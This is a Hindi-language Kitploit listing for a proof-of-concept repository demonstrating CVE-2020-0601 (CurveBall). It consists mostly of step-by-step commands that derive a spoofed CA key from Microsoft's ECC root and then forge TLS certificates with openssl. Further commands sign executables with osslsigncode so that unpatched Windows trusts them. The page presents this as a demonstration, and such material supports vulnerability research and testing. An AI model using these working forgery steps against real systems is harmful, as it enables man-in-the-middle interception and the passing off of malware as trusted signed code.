CVE-2020-0601_PoC — CVE-2020-0601 उर्फ कर्वबॉल का प्रदर्शन। https://github.com/kudelskisecurity/chainoffools और https://github.com/ly4k/CurveBall पर उपलब्ध PoC पर आधारित। | Kitploit
उपकरण / GitHub / joelbts / cve-2020-0601_poc
joelbts/cve-2020-0601_poc CVE-2020-0601_PoC CVE-2020-0601 उर्फ कर्वबॉल का प्रदर्शन। https://github.com/kudelskisecurity/chainoffools और https://github.com/ly4k/CurveBall पर उपलब्ध PoC पर आधारित।
27 2 साल पहलेहमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।
पिछले 7 दिन पिछले 30 दिन
आवश्यकताएँ/उपयोग किया गया सॉफ्टवेयर
python संस्करण 3.11
openssl संस्करण 3.1
osslsigncode संस्करण 2.5
gen-key.py और httpServer.py में पायथन लाइब्रेरीज़
TLS प्रमाणपत्र हस्ताक्षर
एक नकली CA कुंजी बनाएं विश्वसनीय रूट प्रमाणपत्र से (secp384r1 और PEM प्रारूप में होना चाहिए) python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
एक नकली CA बनाएं नकली कुंजी का उपयोग करके openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf
एक और SSL प्रमाणपत्र बनाएं (किसी भी प्रकार का) जो नकली CA द्वारा हस्ताक्षरित किया जाएगा openssl ecparam -name secp384r1 -genkey -noout -out cert.key
प्रमाणपत्र के लिए एक प्रमाणपत्र हस्ताक्षर अनुरोध बनाएं openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req
नकली CA प्रमाणपत्र का उपयोग करके CSR पर हस्ताक्षर करें openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req
नकली प्रमाणपत्र श्रृंखला के साथ एक HTTPS सर्वर प्रारंभ करें
विंडोज मशीन में
प्रमाणपत्र विश्वसनीय होना चाहिए, और 'Hello World' प्रदर्शित होना चाहिए
यदि त्रुटि होती है, तो सुनिश्चित करें कि सिस्टम समय सही है
कोड हस्ताक्षर
एक नकली CA कुंजी बनाएं विश्वसनीय रूट प्रमाणपत्र से (secp384r1 और PEM प्रारूप में होना चाहिए) python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
एक नकली CA बनाएं नकली कुंजी का उपयोग करके openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf
एक नई कुंजी बनाएं जो कोड हस्ताक्षर के लिए उपयोग की जा सकती है openssl ecparam -name secp384r1 -genkey -noout -out cert.key
कुंजी का उपयोग करके एक प्रमाणपत्र हस्ताक्षर अनुरोध बनाएं, जिस पर हम हस्ताक्षर कर सकते हैं openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req
नकली CA का उपयोग करके CSR पर हस्ताक्षर करें openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req
एक्सेस पर हस्ताक्षर करने के लिए कुंजी, प्रमाणपत्र, और नकली CA को एक PKCS12 फ़ाइल में पैक करें openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12
एक निष्पादन योग्य फ़ाइल पर हस्ताक्षर करने के लिए PKCS12 फ़ाइल का उपयोग करें osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe